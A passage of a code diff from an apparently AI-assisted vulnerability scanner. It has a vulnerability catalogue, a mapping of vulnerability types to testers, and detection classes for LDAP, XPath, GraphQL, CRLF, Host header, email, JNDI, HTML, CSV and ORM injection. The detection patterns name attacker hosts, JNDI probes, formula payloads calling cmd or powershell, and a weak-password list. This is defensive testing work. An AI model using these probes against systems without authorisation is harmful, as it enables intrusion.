"api_key_exposure": {"title": "API Key Exposure", "severity": "high", "cwe_id": "CWE-798", "description": "API keys or secrets hardcoded in client-side code or public files.", "impact": "Unauthorized API access, financial impact, data breach via exposed keys.", "remediation": "1. Use environment variables for secrets\n2. Implement key rotation\n3. Use backend proxy for API calls\n4. Monitor key usage for anomalies"},
"source_code_disclosure": {"title": "Source Code Disclosure", "severity": "high", "cwe_id": "CWE-540", "description": "Application source code accessible through misconfigured servers, backups, or VCS exposure.", "impact": "White-box attack surface, credential discovery, vulnerability identification.", "remediation": "1. Block .git, .svn access\n2. Remove source maps in production\n3. Delete backup files\n4. Configure web server to block sensitive extensions"},
"backup_file_exposure": {"title": "Backup File Exposure", "severity": "high", "cwe_id": "CWE-530", "description": "Backup files, database dumps, or archives accessible from web server.", "impact": "Full source code access, database contents including credentials.", "remediation": "1. Store backups outside web root\n2. Remove old backup files\n3. Block backup extensions in web server\n4. Encrypt backup files"},
"version_disclosure": {"title": "Software Version Disclosure", "severity": "low", "cwe_id": "CWE-200", "description": "Specific software versions exposed enabling targeted CVE exploitation.", "impact": "Targeted exploitation of known vulnerabilities for the specific version.", "remediation": "1. Remove version from headers\n2. Update software regularly\n3. Remove version-disclosing files\n4. Customize error pages"},
# Crypto & Supply
"weak_encryption": {"title": "Weak Encryption Algorithm", "severity": "medium", "cwe_id": "CWE-327", "description": "Use of weak/deprecated encryption algorithms (DES, RC4, ECB mode).", "impact": "Data decryption, MITM attacks, breaking confidentiality protections.", "remediation": "1. Use AES-256-GCM or ChaCha20\n2. Disable weak cipher suites\n3. Use TLS 1.2+ only\n4. Regular cryptographic review"},
"weak_hashing": {"title": "Weak Hashing Algorithm", "severity": "medium", "cwe_id": "CWE-328", "description": "Use of weak hash algorithms (MD5, SHA1) for security-critical purposes.", "impact": "Password cracking, hash collision attacks, integrity bypass.", "remediation": "1. Use bcrypt/scrypt/argon2 for passwords\n2. Use SHA-256+ for integrity\n3. Always use salts\n4. Implement key stretching"},
"weak_random": {"title": "Weak Random Number Generation", "severity": "medium", "cwe_id": "CWE-330", "description": "Predictable random numbers used for security tokens or session IDs.", "impact": "Token prediction, session hijacking, CSRF token bypass.", "remediation": "1. Use cryptographic PRNG (secrets module, SecureRandom)\n2. Avoid Math.random() for security\n3. Use sufficient entropy\n4. Regular token rotation"},
"cleartext_transmission": {"title": "Cleartext Transmission of Sensitive Data", "severity": "medium", "cwe_id": "CWE-319", "description": "Sensitive data transmitted over unencrypted HTTP connections.", "impact": "Credential theft via MITM, session hijacking, data exposure.", "remediation": "1. Enforce HTTPS everywhere\n2. Implement HSTS with preload\n3. Redirect HTTP to HTTPS\n4. Set Secure flag on cookies"},
"vulnerable_dependency": {"title": "Vulnerable Third-Party Dependency", "severity": "varies", "cwe_id": "CWE-1104", "description": "Third-party library with known CVEs in use.", "impact": "Depends on specific CVE - from XSS to RCE.", "remediation": "1. Regular dependency updates\n2. Use automated vulnerability scanning\n3. Monitor CVE advisories\n4. Implement SCA in CI/CD"},
"outdated_component": {"title": "Outdated Software Component", "severity": "medium", "cwe_id": "CWE-1104", "description": "Significantly outdated CMS, framework, or server with multiple known CVEs.", "impact": "Multiple exploitable vulnerabilities, targeted attacks.", "remediation": "1. Update to latest stable version\n2. Enable automatic security updates\n3. Monitor end-of-life announcements\n4. Implement patch management"},
"insecure_cdn": {"title": "Insecure CDN Resource Loading", "severity": "low", "cwe_id": "CWE-829", "description": "External scripts loaded without Subresource Integrity (SRI) hashes.", "impact": "Supply chain attack via CDN compromise, mass XSS.", "remediation": "1. Add integrity= attribute to script/link tags\n2. Use crossorigin attribute\n3. Self-host critical resources\n4. Implement CSP with hash sources"},
"container_escape": {"title": "Container Escape / Misconfiguration", "severity": "critical", "cwe_id": "CWE-250", "description": "Container running with elevated privileges or exposed host resources.", "impact": "Host system compromise, lateral movement, data access across containers.", "remediation": "1. Don't use --privileged\n2. Drop unnecessary capabilities\n3. Don't mount Docker socket\n4. Use seccomp/AppArmor profiles"},
# Cloud & API
"s3_bucket_misconfiguration": {"title": "S3/Cloud Storage Misconfiguration", "severity": "high", "cwe_id": "CWE-284", "description": "Cloud storage bucket with public read/write access.", "impact": "Data exposure, data tampering, hosting malicious content.", "remediation": "1. Enable S3 Block Public Access\n2. Review bucket policies\n3. Use IAM policies for access\n4. Enable access logging"},
"cloud_metadata_exposure": {"title": "Cloud Metadata Exposure", "severity": "critical", "cwe_id": "CWE-918", "description": "Cloud instance metadata service accessible exposing credentials.", "impact": "IAM credential theft, cloud account compromise, lateral movement.", "remediation": "1. Use IMDSv2 (token-required)\n2. Block metadata endpoint in firewall\n3. Implement SSRF protection\n4. Use minimal IAM roles"},
"serverless_misconfiguration": {"title": "Serverless Misconfiguration", "severity": "medium", "cwe_id": "CWE-284", "description": "Serverless function with excessive permissions or missing auth.", "impact": "Unauthorized function execution, environment variable exposure, privilege escalation.", "remediation": "1. Apply least privilege IAM roles\n2. Require authentication\n3. Don't expose secrets in env vars\n4. Implement function authorization"},
"graphql_introspection": {"title": "GraphQL Introspection Enabled", "severity": "low", "cwe_id": "CWE-200", "description": "GraphQL introspection enabled in production exposing full API schema.", "impact": "Complete API mapping, discovery of sensitive types and mutations.", "remediation": "1. Disable introspection in production\n2. Use persisted queries\n3. Implement field-level authorization\n4. Use query allowlisting"},
"graphql_dos": {"title": "GraphQL Denial of Service", "severity": "medium", "cwe_id": "CWE-400", "description": "GraphQL endpoint vulnerable to resource-exhaustion via complex/nested queries.", "impact": "Service unavailability, resource exhaustion, increased infrastructure costs.", "remediation": "1. Implement query depth limits\n2. Add query complexity analysis\n3. Set timeout on queries\n4. Use persisted/allowlisted queries"},
"rest_api_versioning": {"title": "Insecure API Version Exposure", "severity": "low", "cwe_id": "CWE-284", "description": "Older API versions with weaker security controls still accessible.", "impact": "Bypass newer security controls via old API versions.", "remediation": "1. Deprecate and remove old API versions\n2. Apply same security to all versions\n3. Monitor old version usage\n4. Set deprecation timelines"},
"soap_injection": {"title": "SOAP/XML Web Service Injection", "severity": "high", "cwe_id": "CWE-91", "description": "Injection in SOAP/XML web service parameters manipulating queries.", "impact": "Data extraction, XXE via SOAP, SOAP action spoofing for unauthorized operations.", "remediation": "1. Validate SOAP input\n2. Disable XML external entities\n3. Validate SOAPAction header\n4. Use WS-Security"},
"api_rate_limiting": {"title": "Missing API Rate Limiting", "severity": "medium", "cwe_id": "CWE-770", "description": "API endpoints lacking rate limiting allowing unlimited requests.", "impact": "Brute force, scraping, DoS, API abuse at scale.", "remediation": "1. Implement rate limiting per user/IP\n2. Return 429 with Retry-After\n3. Use API gateway throttling\n4. Implement sliding window algorithm"},
"excessive_data_exposure": {"title": "Excessive Data Exposure", "severity": "medium", "cwe_id": "CWE-213", "description": "APIs returning more data than the client needs, including sensitive fields.", "impact": "Exposure of sensitive fields (password hashes, tokens, PII) to clients.", "remediation": "1. Use response DTOs/serializers\n2. Implement field-level filtering\n3. Apply least-data principle\n4. Separate admin and user endpoints"}
}
# Tester class mappings (100 types).
# Maps each vulnerability type identifier to its tester implementation. Types
# without a dedicated tester either reuse a tester with a compatible detection
# pattern (noted inline) or fall back to BaseTester (AI-driven analysis).
# Fix: removed duplicate dict keys ("ssrf_cloud" and "cors_misconfig" each
# appeared twice with identical values; later duplicates silently override).
TESTER_CLASSES = {
    # Injection (10 original + 11 advanced)
    "xss_reflected": XSSReflectedTester,
    "xss_stored": XSSStoredTester,
    "xss_dom": XSSDomTester,
    "command_injection": CommandInjectionTester,
    "ssti": SSTITester,
    "nosql_injection": NoSQLInjectionTester,
    "ldap_injection": LdapInjectionTester,
    "xpath_injection": XpathInjectionTester,
    "graphql_injection": GraphqlInjectionTester,
    "crlf_injection": CrlfInjectionTester,
    "header_injection": HeaderInjectionTester,
    "email_injection": EmailInjectionTester,
    "expression_language_injection": ELInjectionTester,
    "log_injection": LogInjectionTester,
    "html_injection": HtmlInjectionTester,
    "csv_injection": CsvInjectionTester,
    "orm_injection": OrmInjectionTester,
    # XSS Advanced
    "blind_xss": XSSStoredTester,  # Similar detection pattern
    "mutation_xss": XSSReflectedTester,  # Similar detection pattern
    # File Access (5 original + 3 new)
    "lfi": LFITester,
    "rfi": RFITester,
    "path_traversal": PathTraversalTester,
    "xxe": XXETester,
    "file_upload": FileUploadTester,
    "arbitrary_file_read": ArbitraryFileReadTester,
    "arbitrary_file_delete": ArbitraryFileDeleteTester,
    "zip_slip": ZipSlipTester,
    # Request Forgery (3 original + 2 new)
    "ssrf": SSRFTester,
    "ssrf_cloud": SSRFTester,  # Same tester, different payloads
    "csrf": CSRFTester,
    "cors_misconfig": CORSTester,
    "graphql_introspection": GraphqlIntrospectionTester,
    "graphql_dos": GraphqlDosTester,
    # Auth (3 original + 5 new)
    "auth_bypass": AuthBypassTester,
    "jwt_manipulation": JWTManipulationTester,
    "session_fixation": SessionFixationTester,
    "weak_password": WeakPasswordTester,
    "default_credentials": DefaultCredentialsTester,
    "brute_force": AuthBypassTester,  # Similar pattern
    "two_factor_bypass": TwoFactorBypassTester,
    "oauth_misconfiguration": OauthMisconfigTester,
    # Authorization (3 original + 3 new)
    "idor": IDORTester,
    "bola": BOLATester,
    "privilege_escalation": PrivilegeEscalationTester,
    "bfla": BflaTester,
    "mass_assignment": MassAssignmentTester,
    "forced_browsing": ForcedBrowsingTester,
    # Client-Side (3 original + 6 new)
    "clickjacking": ClickjackingTester,
    "open_redirect": OpenRedirectTester,
    "dom_clobbering": DomClobberingTester,
    "postmessage_vulnerability": PostMessageVulnTester,
    "websocket_hijacking": WebsocketHijackTester,
    "prototype_pollution": PrototypePollutionTester,
    "css_injection": CssInjectionTester,
    "tabnabbing": TabnabbingTester,
    # Infrastructure (3 original + 7 new)
    "security_headers": SecurityHeadersTester,
    "ssl_issues": SSLTester,
    "http_methods": HTTPMethodsTester,
    "directory_listing": DirectoryListingTester,
    "debug_mode": DebugModeTester,
    "exposed_admin_panel": ExposedAdminPanelTester,
    "exposed_api_docs": ExposedApiDocsTester,
    "insecure_cookie_flags": InsecureCookieFlagsTester,
    "http_smuggling": HttpSmugglingTester,
    "cache_poisoning": CachePoisoningTester,
    # Logic (9 types)
    "race_condition": RaceConditionTester,
    "business_logic": BusinessLogicTester,
    "rate_limit_bypass": RateLimitBypassTester,
    "parameter_pollution": ParameterPollutionTester,
    "type_juggling": TypeJugglingTester,
    "timing_attack": TimingAttackTester,
    "host_header_injection": HostHeaderInjectionTester,
    "insecure_deserialization": BaseTester,  # AI-driven
    "subdomain_takeover": SubdomainTakeoverTester,
    "improper_error_handling": BaseTester,  # AI-driven
    # Data Exposure (6 types)
    "sensitive_data_exposure": SensitiveDataExposureTester,
    "information_disclosure": InformationDisclosureTester,
    "api_key_exposure": ApiKeyExposureTester,
    "source_code_disclosure": SourceCodeDisclosureTester,
    "backup_file_exposure": BackupFileExposureTester,
    "version_disclosure": VersionDisclosureTester,
    # Crypto & Supply (8 types - mostly inspection/AI-driven)
    "weak_encryption": BaseTester,
    "weak_hashing": BaseTester,
    "weak_random": BaseTester,
    "cleartext_transmission": BaseTester,
    "vulnerable_dependency": VulnerableDependencyTester,
    "outdated_component": VulnerableDependencyTester,
    "insecure_cdn": BaseTester,
    "container_escape": ContainerEscapeTester,
    # Cloud & API (7 types)
    "s3_bucket_misconfiguration": S3BucketMisconfigTester,
    "cloud_metadata_exposure": CloudMetadataExposureTester,
    "serverless_misconfiguration": ServerlessMisconfigTester,
    "rest_api_versioning": BaseTester,  # AI-driven
    "soap_injection": BaseTester,  # AI-driven
    "api_rate_limiting": RateLimitBypassTester,
    "excessive_data_exposure": SensitiveDataExposureTester,
}
def __init__(self):
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,532 @@
"""
NeuroSploit v3 - Advanced Injection Vulnerability Testers
Testers for LDAP, XPath, GraphQL, CRLF, Header, Email, EL, Log, HTML, CSV, and ORM injection.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class LdapInjectionTester(BaseTester):
    """Detects LDAP injection via leaked directory errors, wildcard
    enumeration, and filter-manipulation side effects."""

    def __init__(self):
        super().__init__()
        self.name = "ldap_injection"
        # Error signatures leaked by common LDAP stacks (Java JNDI, PHP ldap_*, OpenLDAP).
        self.error_patterns = [
            r"javax\.naming\.NamingException",
            r"LDAPException",
            r"ldap_search\(\)",
            r"ldap_bind\(\)",
            r"Invalid DN syntax",
            r"Bad search filter",
            r"DSA is unavailable",
            r"LDAP error code \d+",
            r"cn=.*,\s*ou=.*,\s*dc=",
            r"objectClass=",
            r"No such object",
            r"invalid attribute description",
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for LDAP injection indicators."""
        # 1) Server-side LDAP error text leaked into the response body.
        for signature in self.error_patterns:
            leak = re.search(signature, response_body, re.IGNORECASE)
            if leak is not None:
                return True, 0.8, f"LDAP error detected: {leak.group(0)[:100]}"
        # 2) Wildcard payloads: more than one "dn:" entry implies directory enumeration.
        if "*" in payload:
            entries = re.findall(r"dn:\s+\S+", response_body, re.IGNORECASE)
            if len(entries) > 1:
                return True, 0.85, f"LDAP wildcard returned {len(entries)} directory entries"
        # 3) Filter-manipulation payloads: a large 200 response hints at extra data.
        filter_tampering = ")(|" in payload or "*)(objectClass" in payload
        if filter_tampering and response_status == 200 and len(response_body) > 5000:
            return True, 0.6, "LDAP filter manipulation may have returned extra data"
        return False, 0.0, None
class XpathInjectionTester(BaseTester):
    """Detects XPath injection via parser errors, boolean-based data leaks,
    and exposed XML documents."""

    def __init__(self):
        super().__init__()
        self.name = "xpath_injection"
        # Error signatures from common XPath engines (Java, PHP, libxml, lxml).
        self.error_patterns = [
            r"XPathException",
            r"Invalid XPath",
            r"xpath syntax error",
            r"javax\.xml\.xpath",
            r"XPathEvalError",
            r"xmlXPathEval:",
            r"XPATH syntax error",
            r"DOMXPath",
            r"SimpleXMLElement::xpath\(\)",
            r"lxml\.etree\.XPathEvalError",
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for XPath injection indicators."""
        # 1) XPath engine error leaked into the body.
        for signature in self.error_patterns:
            leak = re.search(signature, response_body, re.IGNORECASE)
            if leak is not None:
                return True, 0.85, f"XPath error detected: {leak.group(0)[:100]}"
        # 2) Boolean-based injection: an always-true condition yielding XML data.
        sent_true_condition = "' or '1'='1" in payload or "or 1=1" in payload
        if sent_true_condition and response_status == 200:
            if len(re.findall(r"<[a-zA-Z][^>]*>", response_body)) > 5:
                return True, 0.65, "XPath boolean injection may have returned XML data"
        # 3) Union/extractvalue payloads exposing a raw XML document.
        if "' | //" in payload or "extractvalue(" in payload.lower():
            if re.search(r"<\?xml\s+version=", response_body):
                return True, 0.7, "XML document exposed via XPath injection"
        return False, 0.0, None
class GraphqlInjectionTester(BaseTester):
    """Tester for GraphQL injection / introspection exposure."""

    def __init__(self):
        super().__init__()
        self.name = "graphql_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for GraphQL issues.

        Fix: removed an unused `body_lower` local that was computed on every
        call; collapsed the error-pattern loop (the follow-up message check did
        not depend on which pattern matched) into a single any() test.
        """
        # 1) Introspection query answered with schema details.
        if "__schema" in payload or "__type" in payload or "introspection" in payload.lower():
            if '"__schema"' in response_body or '"__type"' in response_body:
                return True, 0.9, "GraphQL introspection enabled - schema exposed"
            if '"types"' in response_body and '"queryType"' in response_body:
                return True, 0.9, "GraphQL schema types exposed via introspection"
        # 2) GraphQL error responses that leak field/type/argument names.
        graphql_errors = [
            r'"errors"\s*:\s*\[',
            r"Cannot query field",
            r"Unknown argument",
            r"Field .* not found in type",
            r"Syntax Error.*GraphQL",
            r"GraphQL error",
        ]
        if any(re.search(p, response_body, re.IGNORECASE) for p in graphql_errors):
            if re.search(r'"message"\s*:\s*".*(?:field|type|argument)', response_body, re.IGNORECASE):
                return True, 0.7, "GraphQL error reveals schema information"
        # 3) A mutation succeeding without errors - authorization must be verified.
        if "mutation" in payload.lower() and response_status == 200:
            if '"data"' in response_body and '"errors"' not in response_body:
                return True, 0.5, "GraphQL mutation succeeded - verify authorization"
        return False, 0.0, None
class CrlfInjectionTester(BaseTester):
    """Detects CRLF injection by looking for attacker-controlled headers in
    the server's response."""

    def __init__(self):
        super().__init__()
        self.name = "crlf_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for CRLF header injection."""
        # Normalize header names for case-insensitive lookups.
        lowered = {name.lower(): value for name, value in response_headers.items()}
        # Canary headers we inject never legitimately appear in a response.
        if "x-test" in lowered:
            return True, 0.95, f"CRLF injection confirmed: X-Test header injected with value '{lowered['x-test']}'"
        if "x-injected" in lowered:
            return True, 0.95, "CRLF injection confirmed: X-Injected header present"
        # Injected Set-Cookie carrying our marker value.
        cookie_value = str(lowered.get("set-cookie", ""))
        if "set-cookie" in lowered and "neurosploit" in cookie_value.lower():
            return True, 0.9, "CRLF injection: injected Set-Cookie header detected"
        # Raw or URL-encoded CRLF sequences surviving inside the Location header.
        redirect_target = lowered.get("location")
        if redirect_target is not None:
            if "\r\n" in redirect_target or "%0d%0a" in redirect_target.lower():
                return True, 0.8, "CRLF characters in Location header"
        return False, 0.0, None
class HeaderInjectionTester(BaseTester):
    """Tester for Host header injection (reflected host values, password
    reset poisoning)."""

    def __init__(self):
        super().__init__()
        self.name = "header_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for Host header injection.

        Fix: removed an unused `headers_lower` local that was built in the
        password-reset branch but never read.
        """
        body_lower = response_body.lower()
        # Attacker-controlled host markers we inject; reflection implies the app
        # trusts the Host header when building URLs.
        evil_markers = ["evil.com", "attacker.com", "neurosploit.test"]
        for marker in evil_markers:
            if marker in payload.lower() and marker in body_lower:
                # Stronger signal when the marker lands inside a URL attribute.
                url_pattern = rf'(?:href|src|action|url|link|redirect)\s*[=:]\s*["\']?[^"\']*{re.escape(marker)}'
                if re.search(url_pattern, response_body, re.IGNORECASE):
                    return True, 0.9, f"Host header injected into response URL: {marker}"
                return True, 0.7, f"Injected host value '{marker}' reflected in response"
        # Password reset poisoning heuristic: reset flows often embed Host-derived
        # links. NOTE(review): FP-prone - flags any 200/302 reset page regardless
        # of payload; confirm findings manually.
        if "password" in body_lower and "reset" in body_lower:
            if response_status in [200, 302]:
                return True, 0.5, "Password reset response may use Host header for link generation"
        return False, 0.0, None
class EmailInjectionTester(BaseTester):
    """Detects email header injection (CC/BCC smuggling) and SMTP error leaks."""

    def __init__(self):
        super().__init__()
        self.name = "email_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for email header injection."""
        body_lower = response_body.lower()
        # Did this payload try to smuggle extra recipient headers?
        header_probes = ["cc:", "bcc:", "\r\nto:", "%0acc:", "%0abcc:"]
        attempted = any(probe in payload.lower() for probe in header_probes)
        if attempted and response_status == 200:
            # The app reporting a successful send after our injection attempt.
            success_indicators = [
                "email sent", "message sent", "mail sent",
                "successfully sent", "email delivered", "sent successfully",
            ]
            for indicator in success_indicators:
                if indicator in body_lower:
                    return True, 0.75, f"Email injection: '{indicator}' after CC/BCC injection attempt"
            # A recipient count implies the injected addresses were accepted.
            if re.search(r"(?:sent to|delivered to|recipients?)\s*:?\s*\d+", response_body, re.IGNORECASE):
                return True, 0.7, "Email sent to multiple recipients after injection"
        # Leaked SMTP errors confirm the input reached the mail layer.
        smtp_errors = [r"SMTP error", r"550 \d+", r"relay access denied", r"mail\(\).*failed"]
        for smtp_pattern in smtp_errors:
            if re.search(smtp_pattern, response_body, re.IGNORECASE):
                return True, 0.6, "SMTP error revealed - email injection attempted"
        return False, 0.0, None
class ELInjectionTester(BaseTester):
    """Detects Expression Language (EL) injection via evaluated math probes
    and leaked Java class references."""

    def __init__(self):
        super().__init__()
        self.name = "el_injection"
        # Probe expression -> value expected only if the server evaluates it.
        self.math_results = {
            "${7*7}": "49",
            "#{7*7}": "49",
            "${3*11}": "33",
            "#{3*11}": "33",
        }

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for EL injection."""
        # 1) A math probe evaluated server-side: the result appears while the
        #    raw expression does not (i.e. it was not simply echoed back).
        for expression, expected in self.math_results.items():
            if expression in payload and expected in response_body and expression not in response_body:
                return True, 0.95, f"EL injection confirmed: {expression} evaluated to {expected}"
        # 2) Java internals surfacing in the body suggest EL reached the JVM.
        java_indicators = [
            r"java\.lang\.\w+",
            r"java\.io\.File",
            r"Runtime\.getRuntime",
            r"ProcessBuilder",
            r"javax\.\w+\.\w+",
            r"org\.apache\.\w+",
            r"getClass\(\)\.forName",
        ]
        for indicator in java_indicators:
            if re.search(indicator, response_body):
                return True, 0.8, f"Java class exposure via EL injection: {indicator}"
        # 3) Spring EL type references (T(...)) echoing class information.
        if "T(java.lang" in payload and re.search(r"class\s+\w+|java\.\w+", response_body):
            return True, 0.7, "Spring EL injection indicator - Java class reference in response"
        return False, 0.0, None
class LogInjectionTester(BaseTester):
    """Detects log injection, log forging, and Log4Shell/JNDI attempts."""

    def __init__(self):
        super().__init__()
        self.name = "log_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for log/JNDI injection."""
        # 1) JNDI (Log4Shell) probe: an out-of-band callback is conclusive;
        #    otherwise look for Log4j/JNDI traces in the response itself.
        if "${jndi:" in payload.lower():
            if context.get("callback_received"):
                return True, 0.95, "JNDI injection confirmed via callback"
            log4j_indicators = [
                r"log4j", r"Log4jException", r"JNDI lookup",
                r"javax\.naming", r"InitialContext",
            ]
            for indicator in log4j_indicators:
                if re.search(indicator, response_body, re.IGNORECASE):
                    return True, 0.7, f"Log4j/JNDI indicator in response: {indicator}"
        # 2) Newline smuggling: injected marker shows up inside log-formatted lines.
        if "\n" in payload or "%0a" in payload.lower() or "\\n" in payload:
            log_patterns = [
                r"\[\d{4}-\d{2}-\d{2}.*\].*neurosploit",
                r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}.*neurosploit",
                r"(?:INFO|WARN|ERROR|DEBUG)\s+.*neurosploit",
            ]
            for log_pattern in log_patterns:
                if re.search(log_pattern, response_body, re.IGNORECASE):
                    return True, 0.7, "Log injection: injected content appears in log-format output"
        # 3) Weak signal: marker echoed near log/audit wording.
        if "neurosploit" in payload and response_status == 200:
            if re.search(r"(?:log|audit|event).*neurosploit", response_body, re.IGNORECASE):
                return True, 0.5, "Injected marker appears in log/audit output"
        return False, 0.0, None
class HtmlInjectionTester(BaseTester):
    """Tester for HTML Injection vulnerabilities.

    Flags responses that render attacker-supplied markup, either by matching
    known canary tags (e.g. <b>neurosploit</b>) or by spotting the payload's
    own tag reflected without entity encoding.
    """
    def __init__(self):
        super().__init__()
        # Tester identifier used by the registry.
        self.name = "html_injection"
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for rendered HTML tags in response.

        Returns a (vulnerable, confidence, evidence) tuple.
        """
        # Error responses are unlikely to render injected markup; skip them.
        if response_status >= 400:
            return False, 0.0, None
        # Check for injected HTML tags rendered in response. Each entry is a
        # (regex, human-readable description) pair for a known canary payload.
        html_tests = [
            (r"<b>neurosploit</b>", "Bold tag rendered"),
            (r"<i>neurosploit</i>", "Italic tag rendered"),
            (r"<u>neurosploit</u>", "Underline tag rendered"),
            (r'<a\s+href=["\']?[^"\']*["\']?>neurosploit</a>', "Anchor tag rendered"),
            (r'<img\s+src=["\']?[^"\']*["\']?', "Image tag rendered"),
            (r'<form\s+[^>]*action=', "Form tag rendered"),
            (r'<iframe\s+', "IFrame tag rendered"),
            (r'<marquee>', "Marquee tag rendered"),
            (r'<h1>neurosploit</h1>', "H1 tag rendered"),
            (r'<div\s+style=', "Styled div rendered"),
        ]
        for pattern, description in html_tests:
            if re.search(pattern, response_body, re.IGNORECASE):
                # Verify it wasn't already there (check if payload was actually injected).
                # NOTE(review): this checks for ANY canary tag in the payload, not the
                # specific tag that matched - confirm this looseness is intended.
                if any(tag in payload.lower() for tag in ["<b>", "<i>", "<u>", "<a ", "<img", "<form", "<iframe", "<marquee", "<h1>", "<div"]):
                    return True, 0.8, f"HTML injection: {description}"
        # Fallback: check for payload reflection without encoding.
        if "<" in payload and ">" in payload:
            # Extract the first tag name from the payload itself.
            tag_match = re.search(r"<(\w+)[^>]*>", payload)
            if tag_match:
                tag_name = tag_match.group(1)
                # Unencoded tag present and no entity-encoded (&lt;) variant seen.
                if f"<{tag_name}" in response_body and f"&lt;{tag_name}" not in response_body:
                    return True, 0.75, f"HTML tag <{tag_name}> reflected without encoding"
        return False, 0.0, None
class CsvInjectionTester(BaseTester):
    """Detects CSV (formula) injection in spreadsheet/CSV export responses."""

    def __init__(self):
        super().__init__()
        self.name = "csv_injection"
        # Leading characters spreadsheet apps interpret as formula starts.
        self.formula_chars = ["=", "+", "-", "@", "\t", "\r"]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for CSV formula injection."""
        lowered = {name.lower(): value.lower() for name, value in response_headers.items()}
        content_type = lowered.get("content-type", "")
        disposition = lowered.get("content-disposition", "")
        # Is this response a CSV/spreadsheet download?
        is_csv = "text/csv" in content_type or "spreadsheet" in content_type
        is_export = "content-disposition" in lowered and any(
            extension in disposition for extension in [".csv", ".xls", ".xlsx"]
        )
        if is_csv or is_export:
            # Formula-leading characters surviving unescaped in the export.
            for char in self.formula_chars:
                if char in payload and payload in response_body:
                    return True, 0.8, f"CSV injection: formula character '{char}' preserved in export"
            # Known-dangerous formula shapes inside the exported data.
            formula_patterns = [
                r'[=+\-@].*(?:HYPERLINK|IMPORTXML|IMPORTDATA|cmd|powershell)',
                r'=\w+\(.*\)',
            ]
            for formula_pattern in formula_patterns:
                if re.search(formula_pattern, response_body):
                    return True, 0.7, "CSV injection: formula pattern found in export data"
        # Not an export, but a formula-leading payload was stored verbatim.
        if response_status in [200, 201] and any(c in payload for c in self.formula_chars[:4]):
            if payload in response_body:
                return True, 0.4, "Formula characters accepted and stored - verify CSV export"
        return False, 0.0, None
class OrmInjectionTester(BaseTester):
    """Detects ORM injection via framework error leaks and filter-bypass
    heuristics."""

    def __init__(self):
        super().__init__()
        self.name = "orm_injection"
        # Error signatures from popular ORMs across ecosystems.
        self.error_patterns = [
            r"Hibernate.*Exception",
            r"javax\.persistence",
            r"org\.hibernate",
            r"ActiveRecord::.*Error",
            r"Sequelize.*Error",
            r"SQLAlchemy.*Error",
            r"Doctrine.*Exception",
            r"TypeORM.*Error",
            r"Prisma.*Error",
            r"EntityFramework.*Exception",
            r"LINQ.*Exception",
            r"django\.db.*Error",
            r"peewee\.\w+Error",
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for ORM injection."""
        # 1) ORM/framework exception text leaked into the response.
        for signature in self.error_patterns:
            leak = re.search(signature, response_body, re.IGNORECASE)
            if leak is not None:
                return True, 0.8, f"ORM error detected: {leak.group(0)[:100]}"
        # 2) Operator-style payloads (__gt, $ne, ...): with a recorded baseline,
        #    a large response-size delta suggests the filter was manipulated.
        operators = ["__gt", "__lt", "__ne", "$ne", "$gt", ">=", "!="]
        if any(op in payload for op in operators) and response_status == 200:
            if "baseline_length" in context:
                delta = abs(len(response_body) - context["baseline_length"])
                if delta > 500:
                    return True, 0.6, f"ORM filter manipulation: response size differs by {delta} bytes"
        # 3) all()-style payloads returning an unexpectedly large result set.
        if "__all" in payload or "objects.all" in payload:
            if response_status == 200 and len(response_body) > 10000:
                return True, 0.5, "ORM injection may have bypassed query filters - large data returned"
        return False, 0.0, None
+223
View File
@@ -122,3 +122,226 @@ class SessionFixationTester(BaseTester):
return True, 0.6, "Session ID exposed in URL"
return False, 0.0, None
class WeakPasswordTester(BaseTester):
    """Tester for weak password acceptance during login/registration."""

    def __init__(self):
        super().__init__()
        self.name = "weak_password"
        # Common weak passwords probed by the payload generator.
        self.weak_passwords = [
            "123456", "password", "12345678", "qwerty", "abc123",
            "111111", "123123", "admin", "letmein", "welcome",
            "1234", "1", "a"
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check whether authentication succeeded with a weak password.

        Fixes: removed an unused `body_lower` local; the matched password is
        now resolved once up front (the original repeated the `next()` lookup
        in both success branches) and preferring the longest match, so e.g.
        "12345678" is no longer reported as "123456".
        """
        # Longest-first so the most specific weak password is reported.
        # NOTE(review): substring matching means one-char entries ("1", "a")
